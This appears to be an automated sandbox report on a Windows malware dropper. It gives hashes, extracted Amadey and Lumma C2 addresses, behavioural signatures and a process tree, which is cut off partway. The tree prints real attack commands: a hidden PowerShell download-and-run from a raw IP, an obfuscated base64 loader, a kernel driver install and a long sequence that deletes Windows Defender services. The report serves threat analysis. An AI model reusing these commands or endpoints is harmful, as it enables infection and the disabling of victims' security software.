Analysis

  • max time kernel
    88s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30/03/2025, 13:56

General

  • Target

    2025-03-30_3888a76a57addf78b255790998585788_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    3888a76a57addf78b255790998585788

  • SHA1

    d1386c608e1ab9f9a861564e5a96ec1f17645953

  • SHA256

    12b3896594e0d615701eb440899aa6cac15d69a162401ccab136b1d6416d5b22

  • SHA512

    3497ba893ba8335b1f8bb7a86e3c6e1bf5b23e78baef73c49787cc64e88a8ccc79746a890932e9d6d2b3937fc3ab4e9f470d1d32f3c6b5e9cadfc13eb3270379

  • SSDEEP

    24576:eqDEvCTbMWu7rQYlBQcBiT6rprG8a01u:eTvC/MTQYxsWR7a01

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

amadey

Version

5.20

Botnet

97fe15

C2

http://185.215.113.209

Attributes
  • install_dir

    97419fb2c0

  • install_file

    futors.exe

  • strings_key

    ce0b89c831d45810d856da111e87cdbf

  • url_paths

    /Di0Her478/index.php

rc4.plain

Extracted

Family

lumma

C2

https://navstarx.shop/FoaJSi

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://byteplusx.digital/aXweAX

https://travewlio.shop/ZNxbHi

https://skynetxc.live/AksoPA

https://pixtreev.run/LkaUz

https://sparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 12 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 31 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 15 IoCs
  • Launches sc.exe 64 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 44 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 5 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 22 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-30_3888a76a57addf78b255790998585788_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-30_3888a76a57addf78b255790998585788_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2120
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn RGtt7maNgDY /tr "mshta C:\Users\Admin\AppData\Local\Temp\rMOmiXNHM.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2192
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn RGtt7maNgDY /tr "mshta C:\Users\Admin\AppData\Local\Temp\rMOmiXNHM.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2804
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\rMOmiXNHM.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2388
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'SJ8RFQPHUYSGKFTTDNHZLNGBGOLHEAKG.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1080
        • C:\Users\Admin\AppData\Local\TempSJ8RFQPHUYSGKFTTDNHZLNGBGOLHEAKG.EXE
          "C:\Users\Admin\AppData\Local\TempSJ8RFQPHUYSGKFTTDNHZLNGBGOLHEAKG.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2828
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1868
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1992
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2956
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2812
            • C:\Users\Admin\AppData\Local\Temp\10374380101\93d81ab9fe.exe
              "C:\Users\Admin\AppData\Local\Temp\10374380101\93d81ab9fe.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2508
              • C:\Users\Admin\AppData\Local\Temp\221.exe
                "C:\Users\Admin\AppData\Local\Temp\221.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2596
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\141D.tmp\141E.tmp\141F.bat C:\Users\Admin\AppData\Local\Temp\221.exe"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1804
                  • C:\Users\Admin\AppData\Local\Temp\221.exe
                    "C:\Users\Admin\AppData\Local\Temp\221.exe" go
                    9⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    • Suspicious use of WriteProcessMemory
                    PID:688
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\148A.tmp\148B.tmp\148C.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"
                      10⤵
                      • Drops file in Program Files directory
                      • Suspicious use of WriteProcessMemory
                      PID:784
                      • C:\Windows\system32\sc.exe
                        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                        11⤵
                        • Launches sc.exe
                        PID:900
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        11⤵
                          PID:1536
                        • C:\Windows\system32\timeout.exe
                          timeout /t 1
                          11⤵
                          • Delays execution with timeout.exe
                          PID:1528
                        • C:\Windows\system32\sc.exe
                          sc stop ddrver
                          11⤵
                          • Launches sc.exe
                          PID:592
                        • C:\Windows\system32\sc.exe
                          sc start ddrver
                          11⤵
                          • Launches sc.exe
                          PID:2472
                        • C:\Windows\system32\takeown.exe
                          takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                          11⤵
                          • Possible privilege escalation attempt
                          • Modifies file permissions
                          PID:2988
                        • C:\Windows\system32\icacls.exe
                          icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                          11⤵
                          • Possible privilege escalation attempt
                          • Modifies file permissions
                          PID:1304
                        • C:\Windows\system32\sc.exe
                          sc stop "WinDefend"
                          11⤵
                          • Launches sc.exe
                          PID:2216
                        • C:\Windows\system32\sc.exe
                          sc delete "WinDefend"
                          11⤵
                          • Launches sc.exe
                          PID:2188
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                          11⤵
                            PID:2364
                          • C:\Windows\system32\sc.exe
                            sc stop "MDCoreSvc"
                            11⤵
                            • Launches sc.exe
                            PID:1728
                          • C:\Windows\system32\sc.exe
                            sc delete "MDCoreSvc"
                            11⤵
                            • Launches sc.exe
                            PID:1172
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                            11⤵
                              PID:2424
                            • C:\Windows\system32\sc.exe
                              sc stop "WdNisSvc"
                              11⤵
                              • Launches sc.exe
                              PID:2464
                            • C:\Windows\system32\sc.exe
                              sc delete "WdNisSvc"
                              11⤵
                              • Launches sc.exe
                              PID:2416
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                              11⤵
                                PID:1644
                              • C:\Windows\system32\sc.exe
                                sc stop "Sense"
                                11⤵
                                • Launches sc.exe
                                PID:468
                              • C:\Windows\system32\sc.exe
                                sc delete "Sense"
                                11⤵
                                • Launches sc.exe
                                PID:2412
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                11⤵
                                  PID:1244
                                • C:\Windows\system32\sc.exe
                                  sc stop "wscsvc"
                                  11⤵
                                  • Launches sc.exe
                                  PID:1764
                                • C:\Windows\system32\sc.exe
                                  sc delete "wscsvc"
                                  11⤵
                                  • Launches sc.exe
                                  PID:880
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                  11⤵
                                    PID:1072
                                  • C:\Windows\system32\sc.exe
                                    sc stop "SgrmBroker"
                                    11⤵
                                      PID:2564
                                    • C:\Windows\system32\sc.exe
                                      sc delete "SgrmBroker"
                                      11⤵
                                      • Launches sc.exe
                                      PID:1732
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                      11⤵
                                        PID:2124
                                      • C:\Windows\system32\sc.exe
                                        sc stop "SecurityHealthService"
                                        11⤵
                                        • Launches sc.exe
                                        PID:2184
                                      • C:\Windows\system32\sc.exe
                                        sc delete "SecurityHealthService"
                                        11⤵
                                        • Launches sc.exe
                                        PID:1596
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                        11⤵
                                          PID:2428
                                        • C:\Windows\system32\sc.exe
                                          sc stop "webthreatdefsvc"
                                          11⤵
                                          • Launches sc.exe
                                          PID:2180
                                        • C:\Windows\system32\sc.exe
                                          sc delete "webthreatdefsvc"
                                          11⤵
                                            PID:2384
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                            11⤵
                                              PID:2516
                                            • C:\Windows\system32\sc.exe
                                              sc stop "webthreatdefusersvc"
                                              11⤵
                                              • Launches sc.exe
                                              PID:2804
                                            • C:\Windows\system32\sc.exe
                                              sc delete "webthreatdefusersvc"
                                              11⤵
                                              • Launches sc.exe
                                              PID:2392
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                              11⤵
                                                PID:2192
                                              • C:\Windows\system32\sc.exe
                                                sc stop "WdNisDrv"
                                                11⤵
                                                • Launches sc.exe
                                                PID:2396
                                              • C:\Windows\system32\sc.exe
                                                sc delete "WdNisDrv"
                                                11⤵
                                                • Launches sc.exe
                                                PID:2200
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                11⤵
                                                  PID:1692
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "WdBoot"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:2052
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "WdBoot"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:2156
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                  11⤵
                                                    PID:2552
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "WdFilter"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:1152
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "WdFilter"
                                                    11⤵
                                                      PID:2212
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                      11⤵
                                                        PID:2580
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop "SgrmAgent"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:2976
                                                      • C:\Windows\system32\sc.exe
                                                        sc delete "SgrmAgent"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:280
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                        11⤵
                                                          PID:2904
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop "MsSecWfp"
                                                          11⤵
                                                          • Launches sc.exe
                                                          PID:2708
                                                        • C:\Windows\system32\sc.exe
                                                          sc delete "MsSecWfp"
                                                          11⤵
                                                          • Launches sc.exe
                                                          PID:2716
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                          11⤵
                                                            PID:988
                                                          • C:\Windows\system32\sc.exe
                                                            sc stop "MsSecFlt"
                                                            11⤵
                                                            • Launches sc.exe
                                                            PID:1080
                                                          • C:\Windows\system32\sc.exe
                                                            sc delete "MsSecFlt"
                                                            11⤵
                                                            • Launches sc.exe
                                                            PID:2940
                                                          • C:\Windows\system32\reg.exe
                                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                            11⤵
                                                              PID:2832
                                                            • C:\Windows\system32\sc.exe
                                                              sc stop "MsSecCore"
                                                              11⤵
                                                              • Launches sc.exe
                                                              PID:3052
                                                            • C:\Windows\system32\sc.exe
                                                              sc delete "MsSecCore"
                                                              11⤵
                                                              • Launches sc.exe
                                                              PID:668
                                                            • C:\Windows\system32\reg.exe
                                                              reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                              11⤵
                                                                PID:660
                                                              • C:\Windows\system32\schtasks.exe
                                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                11⤵
                                                                  PID:3048
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                  11⤵
